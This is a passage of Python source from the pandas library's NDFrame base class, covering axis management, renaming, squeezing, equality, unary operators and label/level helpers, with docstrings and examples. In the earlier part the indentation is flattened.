):
# copy kwarg is retained for mypy compat, is not used
object.__setattr__(self, "_is_copy", None)
object.__setattr__(self, "_data", data)
object.__setattr__(self, "_item_cache", {})
if attrs is None:
attrs = {}
else:
attrs = dict(attrs)
object.__setattr__(self, "_attrs", attrs)
@classmethod
def _init_mgr(cls, mgr, axes=None, dtype=None, copy=False):
""" passed a manager and a axes dict """
for a, axe in axes.items():
if axe is not None:
mgr = mgr.reindex_axis(
axe, axis=cls._get_block_manager_axis(a), copy=False
)
# make a copy if explicitly requested
if copy:
mgr = mgr.copy()
if dtype is not None:
# avoid further copies if we can
if len(mgr.blocks) > 1 or mgr.blocks[0].values.dtype != dtype:
mgr = mgr.astype(dtype=dtype)
return mgr
# ----------------------------------------------------------------------
@property
def attrs(self) -> Dict[Optional[Hashable], Any]:
"""
Dictionary of global attributes on this object.
.. warning::
attrs is experimental and may change without warning.
"""
if self._attrs is None:
self._attrs = {}
return self._attrs
@attrs.setter
def attrs(self, value: Mapping[Optional[Hashable], Any]) -> None:
self._attrs = dict(value)
@classmethod
def _validate_dtype(cls, dtype):
""" validate the passed dtype """
if dtype is not None:
dtype = pandas_dtype(dtype)
# a compound dtype
if dtype.kind == "V":
raise NotImplementedError(
"compound dtypes are not implemented "
f"in the {cls.__name__} constructor"
)
return dtype
# ----------------------------------------------------------------------
# Construction
@property
def _constructor(self: FrameOrSeries) -> Type[FrameOrSeries]:
"""
Used when a manipulation result has the same dimensions as the
original.
"""
raise AbstractMethodError(self)
@property
def _constructor_sliced(self):
"""
Used when a manipulation result has one lower dimension(s) as the
original, such as DataFrame single columns slicing.
"""
raise AbstractMethodError(self)
@property
def _constructor_expanddim(self):
"""
Used when a manipulation result has one higher dimension as the
original, such as Series.to_frame()
"""
raise NotImplementedError
# ----------------------------------------------------------------------
# Axis
_AXIS_ALIASES = {"rows": 0}
_AXIS_IALIASES = {0: "rows"}
_stat_axis_number = 0
_stat_axis_name = "index"
_ix = None
_AXIS_ORDERS: List[str]
_AXIS_NUMBERS: Dict[str, int]
_AXIS_NAMES: Dict[int, str]
_AXIS_REVERSED: bool
_info_axis_number: int
_info_axis_name: str
_AXIS_LEN: int
def _construct_axes_dict(self, axes=None, **kwargs):
"""Return an axes dictionary for myself."""
d = {a: self._get_axis(a) for a in (axes or self._AXIS_ORDERS)}
d.update(kwargs)
return d
@classmethod
def _construct_axes_from_arguments(
cls, args, kwargs, require_all: bool = False, sentinel=None
):
"""
Construct and returns axes if supplied in args/kwargs.
If require_all, raise if all axis arguments are not supplied
return a tuple of (axes, kwargs).
sentinel specifies the default parameter when an axis is not
supplied; useful to distinguish when a user explicitly passes None
in scenarios where None has special meaning.
"""
# construct the args
args = list(args)
for a in cls._AXIS_ORDERS:
# look for a argument by position
if a not in kwargs:
try:
kwargs[a] = args.pop(0)
except IndexError as err:
if require_all:
raise TypeError(
"not enough/duplicate arguments specified!"
) from err
axes = {a: kwargs.pop(a, sentinel) for a in cls._AXIS_ORDERS}
return axes, kwargs
@classmethod
def _get_axis_number(cls, axis):
axis = cls._AXIS_ALIASES.get(axis, axis)
if is_integer(axis):
if axis in cls._AXIS_NAMES:
return axis
else:
try:
return cls._AXIS_NUMBERS[axis]
except KeyError:
pass
raise ValueError(f"No axis named {axis} for object type {cls}")
@classmethod
def _get_axis_name(cls, axis):
axis = cls._AXIS_ALIASES.get(axis, axis)
if isinstance(axis, str):
if axis in cls._AXIS_NUMBERS:
return axis
else:
try:
return cls._AXIS_NAMES[axis]
except KeyError:
pass
raise ValueError(f"No axis named {axis} for object type {cls}")
def _get_axis(self, axis):
name = self._get_axis_name(axis)
return getattr(self, name)
@classmethod
def _get_block_manager_axis(cls, axis):
"""Map the axis to the block_manager axis."""
axis = cls._get_axis_number(axis)
if cls._AXIS_REVERSED:
m = cls._AXIS_LEN - 1
return m - axis
return axis
def _get_axis_resolvers(self, axis: str) -> Dict[str, ABCSeries]:
# index or columns
axis_index = getattr(self, axis)
d = dict()
prefix = axis[0]
for i, name in enumerate(axis_index.names):
if name is not None:
key = level = name
else:
# prefix with 'i' or 'c' depending on the input axis
# e.g., you must do ilevel_0 for the 0th level of an unnamed
# multiiindex
key = f"{prefix}level_{i}"
level = i
level_values = axis_index.get_level_values(level)
s = level_values.to_series()
s.index = axis_index
d[key] = s
# put the index/columns itself in the dict
if isinstance(axis_index, MultiIndex):
dindex = axis_index
else:
dindex = axis_index.to_series()
d[axis] = dindex
return d
def _get_index_resolvers(self) -> Dict[str, ABCSeries]:
from pandas.core.computation.parsing import clean_column_name
d: Dict[str, ABCSeries] = {}
for axis_name in self._AXIS_ORDERS:
d.update(self._get_axis_resolvers(axis_name))
return {clean_column_name(k): v for k, v in d.items() if not isinstance(k, int)}
def _get_cleaned_column_resolvers(self) -> Dict[str, ABCSeries]:
"""
Return the special character free column resolvers of a dataframe.
Column names with special characters are 'cleaned up' so that they can
be referred to by backtick quoting.
Used in :meth:`DataFrame.eval`.
"""
from pandas.core.computation.parsing import clean_column_name
if isinstance(self, ABCSeries):
return {clean_column_name(self.name): self}
return {
clean_column_name(k): v for k, v in self.items() if not isinstance(k, int)
}
@property
def _info_axis(self):
return getattr(self, self._info_axis_name)
@property
def _stat_axis(self):
return getattr(self, self._stat_axis_name)
@property
def shape(self) -> Tuple[int, ...]:
"""
Return a tuple of axis dimensions
"""
return tuple(len(self._get_axis(a)) for a in self._AXIS_ORDERS)
@property
def axes(self) -> List[Index]:
"""
Return index label(s) of the internal NDFrame
"""
# we do it this way because if we have reversed axes, then
# the block manager shows then reversed
return [self._get_axis(a) for a in self._AXIS_ORDERS]
@property
def ndim(self) -> int:
"""
Return an int representing the number of axes / array dimensions.
Return 1 if Series. Otherwise return 2 if DataFrame.
See Also
--------
ndarray.ndim : Number of array dimensions.
Examples
--------
>>> s = pd.Series({'a': 1, 'b': 2, 'c': 3})
>>> s.ndim
1
>>> df = pd.DataFrame({'col1': [1, 2], 'col2': [3, 4]})
>>> df.ndim
2
"""
return self._data.ndim
@property
def size(self) -> int:
"""
Return an int representing the number of elements in this object.
Return the number of rows if Series. Otherwise return the number of
rows times number of columns if DataFrame.
See Also
--------
ndarray.size : Number of elements in the array.
Examples
--------
>>> s = pd.Series({'a': 1, 'b': 2, 'c': 3})
>>> s.size
3
>>> df = pd.DataFrame({'col1': [1, 2], 'col2': [3, 4]})
>>> df.size
4
"""
return np.prod(self.shape)
@property
def _selected_obj(self: FrameOrSeries) -> FrameOrSeries:
""" internal compat with SelectionMixin """
return self
@property
def _obj_with_exclusions(self: FrameOrSeries) -> FrameOrSeries:
""" internal compat with SelectionMixin """
return self
def set_axis(self, labels, axis: Axis = 0, inplace: bool = False):
"""
Assign desired index to given axis.
Indexes for%(extended_summary_sub)s row labels can be changed by assigning
a list-like or Index.
.. versionchanged:: 0.21.0
The signature is now `labels` and `axis`, consistent with
the rest of pandas API. Previously, the `axis` and `labels`
arguments were respectively the first and second positional
arguments.
Parameters
----------
labels : list-like, Index
The values for the new index.
axis : %(axes_single_arg)s, default 0
The axis to update. The value 0 identifies the rows%(axis_description_sub)s.
inplace : bool, default False
Whether to return a new %(klass)s instance.
Returns
-------
renamed : %(klass)s or None
An object of type %(klass)s if inplace=False, None otherwise.
See Also
--------
%(klass)s.rename_axis : Alter the name of the index%(see_also_sub)s.
"""
if inplace:
setattr(self, self._get_axis_name(axis), labels)
else:
obj = self.copy()
obj.set_axis(labels, axis=axis, inplace=True)
return obj
def _set_axis(self, axis: int, labels: Index) -> None:
labels = ensure_index(labels)
self._data.set_axis(axis, labels)
self._clear_item_cache()
def swapaxes(self: FrameOrSeries, axis1, axis2, copy=True) -> FrameOrSeries:
"""
Interchange axes and swap values axes appropriately.
Returns
-------
y : same as input
"""
i = self._get_axis_number(axis1)
j = self._get_axis_number(axis2)
if i == j:
if copy:
return self.copy()
return self
mapping = {i: j, j: i}
new_axes = (self._get_axis(mapping.get(k, k)) for k in range(self._AXIS_LEN))
new_values = self.values.swapaxes(i, j)
if copy:
new_values = new_values.copy()
return self._constructor(new_values, *new_axes).__finalize__(self)
def droplevel(self: FrameOrSeries, level, axis=0) -> FrameOrSeries:
"""
Return DataFrame with requested index / column level(s) removed.
.. versionadded:: 0.24.0
Parameters
----------
level : int, str, or list-like
If a string is given, must be the name of a level
If list-like, elements must be names or positional indexes
of levels.
axis : {0 or 'index', 1 or 'columns'}, default 0
Axis along which the level(s) is removed:
* 0 or 'index': remove level(s) in column.
* 1 or 'columns': remove level(s) in row.
Returns
-------
DataFrame
DataFrame with requested index / column level(s) removed.
Examples
--------
>>> df = pd.DataFrame([
... [1, 2, 3, 4],
... [5, 6, 7, 8],
... [9, 10, 11, 12]
... ]).set_index([0, 1]).rename_axis(['a', 'b'])
>>> df.columns = pd.MultiIndex.from_tuples([
... ('c', 'e'), ('d', 'f')
... ], names=['level_1', 'level_2'])
>>> df
level_1 c d
level_2 e f
a b
1 2 3 4
5 6 7 8
9 10 11 12
>>> df.droplevel('a')
level_1 c d
level_2 e f
b
2 3 4
6 7 8
10 11 12
>>> df.droplevel('level_2', axis=1)
level_1 c d
a b
1 2 3 4
5 6 7 8
9 10 11 12
"""
labels = self._get_axis(axis)
new_labels = labels.droplevel(level)
result = self.set_axis(new_labels, axis=axis, inplace=False)
return result
def pop(self: FrameOrSeries, item) -> FrameOrSeries:
"""
Return item and drop from frame. Raise KeyError if not found.
Parameters
----------
item : str
Label of column to be popped.
Returns
-------
Series
Examples
--------
>>> df = pd.DataFrame([('falcon', 'bird', 389.0),
... ('parrot', 'bird', 24.0),
... ('lion', 'mammal', 80.5),
... ('monkey', 'mammal', np.nan)],
... columns=('name', 'class', 'max_speed'))
>>> df
name class max_speed
0 falcon bird 389.0
1 parrot bird 24.0
2 lion mammal 80.5
3 monkey mammal NaN
>>> df.pop('class')
0 bird
1 bird
2 mammal
3 mammal
Name: class, dtype: object
>>> df
name max_speed
0 falcon 389.0
1 parrot 24.0
2 lion 80.5
3 monkey NaN
"""
result = self[item]
del self[item]
try:
result._reset_cacher()
except AttributeError:
pass
return result
def squeeze(self, axis=None):
"""
Squeeze 1 dimensional axis objects into scalars.
Series or DataFrames with a single element are squeezed to a scalar.
DataFrames with a single column or a single row are squeezed to a
Series. Otherwise the object is unchanged.
This method is most useful when you don't know if your
object is a Series or DataFrame, but you do know it has just a single
column. In that case you can safely call `squeeze` to ensure you have a
Series.
Parameters
----------
axis : {0 or 'index', 1 or 'columns', None}, default None
A specific axis to squeeze. By default, all length-1 axes are
squeezed.
Returns
-------
DataFrame, Series, or scalar
The projection after squeezing `axis` or all the axes.
See Also
--------
Series.iloc : Integer-location based indexing for selecting scalars.
DataFrame.iloc : Integer-location based indexing for selecting Series.
Series.to_frame : Inverse of DataFrame.squeeze for a
single-column DataFrame.
Examples
--------
>>> primes = pd.Series([2, 3, 5, 7])
Slicing might produce a Series with a single value:
>>> even_primes = primes[primes % 2 == 0]
>>> even_primes
0 2
dtype: int64
>>> even_primes.squeeze()
2
Squeezing objects with more than one value in every axis does nothing:
>>> odd_primes = primes[primes % 2 == 1]
>>> odd_primes
1 3
2 5
3 7
dtype: int64
>>> odd_primes.squeeze()
1 3
2 5
3 7
dtype: int64
Squeezing is even more effective when used with DataFrames.
>>> df = pd.DataFrame([[1, 2], [3, 4]], columns=['a', 'b'])
>>> df
a b
0 1 2
1 3 4
Slicing a single column will produce a DataFrame with the columns
having only one value:
>>> df_a = df[['a']]
>>> df_a
a
0 1
1 3
So the columns can be squeezed down, resulting in a Series:
>>> df_a.squeeze('columns')
0 1
1 3
Name: a, dtype: int64
Slicing a single row from a single column will produce a single
scalar DataFrame:
>>> df_0a = df.loc[df.index < 1, ['a']]
>>> df_0a
a
0 1
Squeezing the rows produces a single scalar Series:
>>> df_0a.squeeze('rows')
a 1
Name: 0, dtype: int64
Squeezing all axes will project directly into a scalar:
>>> df_0a.squeeze()
1
"""
axis = self._AXIS_NAMES if axis is None else (self._get_axis_number(axis),)
return self.iloc[
tuple(
0 if i in axis and len(a) == 1 else slice(None)
for i, a in enumerate(self.axes)
)
]
# ----------------------------------------------------------------------
# Rename
def rename(
self: FrameOrSeries,
mapper: Optional[Renamer] = None,
*,
index: Optional[Renamer] = None,
columns: Optional[Renamer] = None,
axis: Optional[Axis] = None,
copy: bool = True,
inplace: bool = False,
level: Optional[Level] = None,
errors: str = "ignore",
) -> Optional[FrameOrSeries]:
"""
Alter axes input function or functions. Function / dict values must be
unique (1-to-1). Labels not contained in a dict / Series will be left
as-is. Extra labels listed don't throw an error. Alternatively, change
``Series.name`` with a scalar value (Series only).
Parameters
----------
%(axes)s : scalar, list-like, dict-like or function, optional
Scalar or list-like will alter the ``Series.name`` attribute,
and raise on DataFrame.
dict-like or functions are transformations to apply to
that axis' values
copy : bool, default True
Also copy underlying data.
inplace : bool, default False
Whether to return a new %(klass)s. If True then value of copy is
ignored.
level : int or level name, default None
In case of a MultiIndex, only rename labels in the specified
level.
errors : {'ignore', 'raise'}, default 'ignore'
If 'raise', raise a `KeyError` when a dict-like `mapper`, `index`,
or `columns` contains labels that are not present in the Index
being transformed.
If 'ignore', existing keys will be renamed and extra keys will be
ignored.
Returns
-------
renamed : %(klass)s (new object)
Raises
------
KeyError
If any of the labels is not found in the selected axis and
"errors='raise'".
See Also
--------
NDFrame.rename_axis
Examples
--------
>>> s = pd.Series([1, 2, 3])
>>> s
0 1
1 2
2 3
dtype: int64
>>> s.rename("my_name") # scalar, changes Series.name
0 1
1 2
2 3
Name: my_name, dtype: int64
>>> s.rename(lambda x: x ** 2) # function, changes labels
0 1
1 2
4 3
dtype: int64
>>> s.rename({1: 3, 2: 5}) # mapping, changes labels
0 1
3 2
5 3
dtype: int64
Since ``DataFrame`` doesn't have a ``.name`` attribute,
only mapping-type arguments are allowed.
>>> df = pd.DataFrame({"A": [1, 2, 3], "B": [4, 5, 6]})
>>> df.rename(2)
Traceback (most recent call last):
...
TypeError: 'int' object is not callable
``DataFrame.rename`` supports two calling conventions
* ``(index=index_mapper, columns=columns_mapper, ...)``
* ``(mapper, axis={'index', 'columns'}, ...)``
We *highly* recommend using keyword arguments to clarify your
intent.
>>> df.rename(index=str, columns={"A": "a", "B": "c"})
a c
0 1 4
1 2 5
2 3 6
>>> df.rename(index=str, columns={"A": "a", "C": "c"})
a B
0 1 4
1 2 5
2 3 6
Using axis-style parameters
>>> df.rename(str.lower, axis='columns')
a b
0 1 4
1 2 5
2 3 6
>>> df.rename({1: 2, 2: 4}, axis='index')
A B
0 1 4
2 2 5
4 3 6
See the :ref:`user guide <basics.rename>` for more.
"""
if mapper is None and index is None and columns is None:
raise TypeError("must pass an index to rename")
if index is not None or columns is not None:
if axis is not None:
raise TypeError(
"Cannot specify both 'axis' and any of 'index' or 'columns'"
)
elif mapper is not None:
raise TypeError(
"Cannot specify both 'mapper' and any of 'index' or 'columns'"
)
else:
# use the mapper argument
if axis and self._get_axis_number(axis) == 1:
columns = mapper
else:
index = mapper
result = self if inplace else self.copy(deep=copy)
for axis_no, replacements in enumerate((index, columns)):
if replacements is None:
continue
ax = self._get_axis(axis_no)
baxis = self._get_block_manager_axis(axis_no)
f = com.get_rename_function(replacements)
if level is not None:
level = ax._get_level_number(level)
# GH 13473
if not callable(replacements):
indexer = ax.get_indexer_for(replacements)
if errors == "raise" and len(indexer[indexer == -1]):
missing_labels = [
label
for index, label in enumerate(replacements)
if indexer[index] == -1
]
raise KeyError(f"{missing_labels} not found in axis")
result._data = result._data.rename_axis(
f, axis=baxis, copy=copy, level=level
)
result._clear_item_cache()
if inplace:
self._update_inplace(result._data)
return None
else:
return result.__finalize__(self)
@rewrite_axis_style_signature("mapper", [("copy", True), ("inplace", False)])
def rename_axis(self, mapper=lib.no_default, **kwargs):
"""
Set the name of the axis for the index or columns.
Parameters
----------
mapper : scalar, list-like, optional
Value to set the axis name attribute.
index, columns : scalar, list-like, dict-like or function, optional
A scalar, list-like, dict-like or functions transformations to
apply to that axis' values.
Use either ``mapper`` and ``axis`` to
specify the axis to target with ``mapper``, or ``index``
and/or ``columns``.
.. versionchanged:: 0.24.0
axis : {0 or 'index', 1 or 'columns'}, default 0
The axis to rename.
copy : bool, default True
Also copy underlying data.
inplace : bool, default False
Modifies the object directly, instead of creating a new Series
or DataFrame.
Returns
-------
Series, DataFrame, or None
The same type as the caller or None if `inplace` is True.
See Also
--------
Series.rename : Alter Series index labels or name.
DataFrame.rename : Alter DataFrame index labels or name.
Index.rename : Set new names on index.
Notes
-----
``DataFrame.rename_axis`` supports two calling conventions
* ``(index=index_mapper, columns=columns_mapper, ...)``
* ``(mapper, axis={'index', 'columns'}, ...)``
The first calling convention will only modify the names of
the index and/or the names of the Index object that is the columns.
In this case, the parameter ``copy`` is ignored.
The second calling convention will modify the names of the
the corresponding index if mapper is a list or a scalar.
However, if mapper is dict-like or a function, it will use the
deprecated behavior of modifying the axis *labels*.
We *highly* recommend using keyword arguments to clarify your
intent.
Examples
--------
**Series**
>>> s = pd.Series(["dog", "cat", "monkey"])
>>> s
0 dog
1 cat
2 monkey
dtype: object
>>> s.rename_axis("animal")
animal
0 dog
1 cat
2 monkey
dtype: object
**DataFrame**
>>> df = pd.DataFrame({"num_legs": [4, 4, 2],
... "num_arms": [0, 0, 2]},
... ["dog", "cat", "monkey"])
>>> df
num_legs num_arms
dog 4 0
cat 4 0
monkey 2 2
>>> df = df.rename_axis("animal")
>>> df
num_legs num_arms
animal
dog 4 0
cat 4 0
monkey 2 2
>>> df = df.rename_axis("limbs", axis="columns")
>>> df
limbs num_legs num_arms
animal
dog 4 0
cat 4 0
monkey 2 2
**MultiIndex**
>>> df.index = pd.MultiIndex.from_product([['mammal'],
... ['dog', 'cat', 'monkey']],
... names=['type', 'name'])
>>> df
limbs num_legs num_arms
type name
mammal dog 4 0
cat 4 0
monkey 2 2
>>> df.rename_axis(index={'type': 'class'})
limbs num_legs num_arms
class name
mammal dog 4 0
cat 4 0
monkey 2 2
>>> df.rename_axis(columns=str.upper)
LIMBS num_legs num_arms
type name
mammal dog 4 0
cat 4 0
monkey 2 2
"""
axes, kwargs = self._construct_axes_from_arguments(
(), kwargs, sentinel=lib.no_default
)
copy = kwargs.pop("copy", True)
inplace = kwargs.pop("inplace", False)
axis = kwargs.pop("axis", 0)
if axis is not None:
axis = self._get_axis_number(axis)
if kwargs:
raise TypeError(
"rename_axis() got an unexpected keyword "
f'argument "{list(kwargs.keys())[0]}"'
)
inplace = validate_bool_kwarg(inplace, "inplace")
if mapper is not lib.no_default:
# Use v0.23 behavior if a scalar or list
non_mapper = is_scalar(mapper) or (
is_list_like(mapper) and not is_dict_like(mapper)
)
if non_mapper:
return self._set_axis_name(mapper, axis=axis, inplace=inplace)
else:
raise ValueError("Use `.rename` to alter labels with a mapper.")
else:
# Use new behavior. Means that index and/or columns
# is specified
result = self if inplace else self.copy(deep=copy)
for axis in range(self._AXIS_LEN):
v = axes.get(self._AXIS_NAMES[axis])
if v is lib.no_default:
continue
non_mapper = is_scalar(v) or (is_list_like(v) and not is_dict_like(v))
if non_mapper:
newnames = v
else:
f = com.get_rename_function(v)
curnames = self._get_axis(axis).names
newnames = [f(name) for name in curnames]
result._set_axis_name(newnames, axis=axis, inplace=True)
if not inplace:
return result
def _set_axis_name(self, name, axis=0, inplace=False):
    """
    Set the name(s) of the requested axis.

    Parameters
    ----------
    name : str or list of str
        Name(s) to set on the axis.
    axis : {0 or 'index', 1 or 'columns'}, default 0
        The axis whose name(s) to set.
    inplace : bool, default False
        If True, modify this object directly and return None.

        .. versionadded:: 0.21.0

    Returns
    -------
    Series, DataFrame, or None
        The same type as the caller, or None when ``inplace`` is True.

    See Also
    --------
    DataFrame.rename : Alter the axis labels of :class:`DataFrame`.
    Series.rename : Alter the index labels or set the index name
        of :class:`Series`.
    Index.rename : Set the name of :class:`Index` or :class:`MultiIndex`.
    """
    axis = self._get_axis_number(axis)
    renamed_index = self._get_axis(axis).set_names(name)
    inplace = validate_bool_kwarg(inplace, "inplace")
    # Mutate in place when requested, otherwise work on a copy.
    target = self if inplace else self.copy()
    target.set_axis(renamed_index, axis=axis, inplace=True)
    return None if inplace else target
# ----------------------------------------------------------------------
# Comparison Methods
def _indexed_same(self, other) -> bool:
    """Return True when every axis of ``other`` equals the matching axis of self."""
    for ax in self._AXIS_ORDERS:
        if not self._get_axis(ax).equals(other._get_axis(ax)):
            return False
    return True
def equals(self, other):
    """
    Test whether two objects contain the same elements.

    Allows two Series or DataFrames to be compared to see whether they
    have the same shape and elements.  NaNs in the same location are
    considered equal.  Column headers do not need to have the same type,
    but the elements within the columns must be of the same dtype.

    Parameters
    ----------
    other : Series or DataFrame
        The other Series or DataFrame to compare with the first.

    Returns
    -------
    bool
        True if all elements are the same in both objects, False otherwise.

    See Also
    --------
    Series.eq : Element-wise equality between two Series.
    DataFrame.eq : Element-wise equality between two DataFrames.
    testing.assert_series_equal : Raises an AssertionError if left and
        right are not equal; can ignore dtype/index/precision differences.
    testing.assert_frame_equal : Like assert_series_equal, but targets
        DataFrames.
    numpy.array_equal : Return True if two arrays have the same shape
        and elements, False otherwise.

    Notes
    -----
    Elements must have the same dtype as their counterparts; column
    labels may differ in type as long as they compare equal (e.g. the
    integer ``1`` and the float ``1.0``).
    """
    # Objects of a different type can never be equal.
    same_type = isinstance(other, self._constructor)
    return same_type and self._data.equals(other._data)
# -------------------------------------------------------------------------
# Unary Methods
def __neg__(self):
    """Unary minus: logical inversion for boolean data, arithmetic negation otherwise."""
    values = com.values_from_object(self)
    if is_bool_dtype(values):
        # Negating booleans means logical inversion, not arithmetic minus.
        negated = operator.inv(values)
    else:
        supported = (
            is_numeric_dtype(values)
            or is_timedelta64_dtype(values)
            or is_object_dtype(values)
        )
        if not supported:
            raise TypeError(f"Unary negative expects numeric dtype, not {values.dtype}")
        negated = operator.neg(values)
    return self.__array_wrap__(negated)
def __pos__(self):
    """Unary plus: pass boolean/period data through unchanged, ``operator.pos`` otherwise."""
    values = com.values_from_object(self)
    if is_bool_dtype(values) or is_period_arraylike(values):
        # +x is a no-op for these dtypes.
        result = values
    else:
        supported = (
            is_numeric_dtype(values)
            or is_timedelta64_dtype(values)
            or is_object_dtype(values)
        )
        if not supported:
            raise TypeError(f"Unary plus expects numeric dtype, not {values.dtype}")
        result = operator.pos(values)
    return self.__array_wrap__(result)
def __invert__(self):
    """Element-wise inversion (``~``); zero-length objects are returned unchanged."""
    if not self.size:
        # operator.invert fails on length-0 data, so short-circuit.
        return self
    inverted = self._data.apply(operator.invert)
    return self._constructor(inverted).__finalize__(self)
def __nonzero__(self):
    """Always raise: the truth value of a Series/DataFrame is ambiguous."""
    msg = (
        f"The truth value of a {type(self).__name__} is ambiguous. "
        "Use a.empty, a.bool(), a.item(), a.any() or a.all()."
    )
    raise ValueError(msg)
__bool__ = __nonzero__
def bool(self):
    """
    Return the bool of a single-element PandasObject.

    The contained value must be a boolean scalar, either True or False.

    Returns
    -------
    bool
        The single boolean value converted to a plain Python bool.

    Raises
    ------
    ValueError
        If the object holds a single non-boolean element, or does not
        hold exactly one element.
    """
    scalar = self.squeeze()
    if isinstance(scalar, (bool, np.bool_)):
        return bool(scalar)
    if is_scalar(scalar):
        raise ValueError(
            "bool cannot act on a non-boolean single element "
            f"{type(self).__name__}"
        )
    # squeeze() left more than one element: raise the standard
    # "truth value is ambiguous" error.
    self.__nonzero__()
def __abs__(self: FrameOrSeries) -> FrameOrSeries:
    # Support the builtin abs() by delegating to the public .abs() method.
    return self.abs()
def __round__(self: FrameOrSeries, decimals: int = 0) -> FrameOrSeries:
    # Support the builtin round() by delegating to the public .round() method.
    return self.round(decimals)
# -------------------------------------------------------------------------
# Label or Level Combination Helpers
#
# A collection of helper methods for DataFrame/Series operations that
# accept a combination of column/index labels and levels. All such
# operations should utilize/extend these methods when possible so that we
# have consistent precedence and validation logic throughout the library.
def _is_level_reference(self, key, axis=0):
    """
    Test whether ``key`` is a level reference for a given axis.

    To be a level reference, ``key`` must name an index level (axis=0)
    or a column level (axis=1) while NOT matching a label on the other
    axis.

    Parameters
    ----------
    key : str
        Potential level name for the given axis.
    axis : int, default 0
        Axis that levels are associated with (0 for index, 1 for columns).

    Returns
    -------
    is_level : bool
    """
    axis = self._get_axis_number(axis)
    if key is None or not is_hashable(key):
        return False
    # A name that also matches a label on the other axis counts as a
    # label reference, not a level reference.
    return key in self.axes[axis].names and not self._is_label_reference(
        key, axis=axis
    )
def _is_label_reference(self, key, axis=0) -> bool_t:
    """
    Test whether ``key`` is a label reference for a given axis.

    To be a label reference, ``key`` must match a column label (axis=0)
    or an index label (axis=1).

    Parameters
    ----------
    key : str
        Potential label name.
    axis : int, default 0
        Axis perpendicular to the axis the labels live on
        (0 searches column labels, 1 searches index labels).

    Returns
    -------
    is_label : bool
    """
    axis = self._get_axis_number(axis)
    if key is None or not is_hashable(key):
        return False
    remaining_axes = (ax for ax in range(self._AXIS_LEN) if ax != axis)
    return any(key in self.axes[ax] for ax in remaining_axes)
def _is_label_or_level_reference(self, key: str, axis: int = 0) -> bool_t:
    """
    Test whether ``key`` is either a label or a level reference for ``axis``.

    Matches a column label or an index level (axis=0), or an index label
    or a column level (axis=1).

    Parameters
    ----------
    key : str
        Potential label or level name.
    axis : int, default 0
        Axis that levels are associated with (0 for index, 1 for columns).

    Returns
    -------
    bool
    """
    if self._is_level_reference(key, axis=axis):
        return True
    return self._is_label_reference(key, axis=axis)
def _check_label_or_level_ambiguity(self, key, axis: int = 0) -> None:
    """
    Raise if ``key`` is ambiguous.

    ``key`` is ambiguous when it matches both a level of the given
    ``axis`` and a label of the other axis.

    Parameters
    ----------
    key : str or object
        Label or level name.
    axis : int, default 0
        Axis that levels are associated with (0 for index, 1 for columns).

    Raises
    ------
    ValueError
        If ``key`` is ambiguous.
    """
    axis = self._get_axis_number(axis)
    if key is None or not is_hashable(key):
        return
    if key not in self.axes[axis].names:
        return
    remaining_axes = (ax for ax in range(self._AXIS_LEN) if ax != axis)
    if not any(key in self.axes[ax] for ax in remaining_axes):
        return
    # `key` names both a level and a label: build a grammatical message.
    if axis == 0:
        level_article, level_type = "an", "index"
        label_article, label_type = "a", "column"
    else:
        level_article, level_type = "a", "column"
        label_article, label_type = "an", "index"
    raise ValueError(
        f"'{key}' is both {level_article} {level_type} level and "
        f"{label_article} {label_type} label, which is ambiguous."
    )
def _get_label_or_level_values(self, key: str, axis: int = 0) -> np.ndarray:
    """
    Return a 1-D array of values associated with `key`, a label or level
    from the given `axis`.
    Retrieval logic:
    - (axis=0): Return column values if `key` matches a column label.
      Otherwise return index level values if `key` matches an index
      level.
    - (axis=1): Return row values if `key` matches an index label.
      Otherwise return column level values if 'key' matches a column
      level
    Parameters
    ----------
    key: str
        Label or level name.
    axis: int, default 0
        Axis that levels are associated with (0 for index, 1 for columns)
    Returns
    -------
    values: np.ndarray
    Raises
    ------
    KeyError
        if `key` matches neither a label nor a level
    ValueError
        if `key` matches multiple labels
    FutureWarning
        if `key` is ambiguous. This will become an ambiguity error in a
        future version
    """
    axis = self._get_axis_number(axis)
    other_axes = [ax for ax in range(self._AXIS_LEN) if ax != axis]
    if self._is_label_reference(key, axis=axis):
        # Labels take precedence over levels; raise first if `key` is
        # also a level name (ambiguous).
        self._check_label_or_level_ambiguity(key, axis=axis)
        values = self.xs(key, axis=other_axes[0])._values
    elif self._is_level_reference(key, axis=axis):
        values = self.axes[axis].get_level_values(key)._values
    else:
        raise KeyError(key)
    # Check for duplicates
    if values.ndim > 1:
        # A 2-D result means `key` matched more than one label.
        if other_axes and isinstance(self._get_axis(other_axes[0]), MultiIndex):
            multi_message = (
                "\n"
                "For a multi-index, the label must be a "
                "tuple with elements corresponding to each level."
            )
        else:
            multi_message = ""
        label_axis_name = "column" if axis == 0 else "index"
        raise ValueError(
            (
                f"The {label_axis_name} label '{key}' "
                f"is not unique.{multi_message}"
            )
        )
    return values
def _drop_labels_or_levels(self, keys, axis: int = 0):
    """
    Drop labels and/or levels for the given `axis`.
    For each key in `keys`:
    - (axis=0): If key matches a column label then drop the column.
      Otherwise if key matches an index level then drop the level.
    - (axis=1): If key matches an index label then drop the row.
      Otherwise if key matches a column level then drop the level.
    Parameters
    ----------
    keys: str or list of str
        labels or levels to drop
    axis: int, default 0
        Axis that levels are associated with (0 for index, 1 for columns)
    Returns
    -------
    dropped: DataFrame
    Raises
    ------
    ValueError
        if any `keys` match neither a label nor a level
    """
    axis = self._get_axis_number(axis)
    # Validate keys
    keys = com.maybe_make_list(keys)
    invalid_keys = [
        k for k in keys if not self._is_label_or_level_reference(k, axis=axis)
    ]
    if invalid_keys:
        raise ValueError(
            (
                "The following keys are not valid labels or "
                f"levels for axis {axis}: {invalid_keys}"
            )
        )
    # Compute levels and labels to drop.  After validation above, every
    # key that is not a level reference must be a label reference.
    levels_to_drop = [k for k in keys if self._is_level_reference(k, axis=axis)]
    labels_to_drop = [k for k in keys if not self._is_level_reference(k, axis=axis)]
    # Perform copy upfront and then use inplace operations below.
    # This ensures that we always perform exactly one copy.
    # ``copy`` and/or ``inplace`` options could be added in the future.
    dropped = self.copy()
    if axis == 0:
        # Handle dropping index levels
        if levels_to_drop:
            dropped.reset_index(levels_to_drop, drop=True, inplace=True)
        # Handle dropping columns labels
        if labels_to_drop:
            dropped.drop(labels_to_drop, axis=1, inplace=True)
    else:
        # Handle dropping column levels
        if levels_to_drop:
            if isinstance(dropped.columns, MultiIndex):
                # Drop the specified levels from the MultiIndex
                dropped.columns = dropped.columns.droplevel(levels_to_drop)
            else:
                # Drop the last level of Index by replacing with
                # a RangeIndex
                dropped.columns = RangeIndex(dropped.columns.size)
        # Handle dropping index labels
        if labels_to_drop:
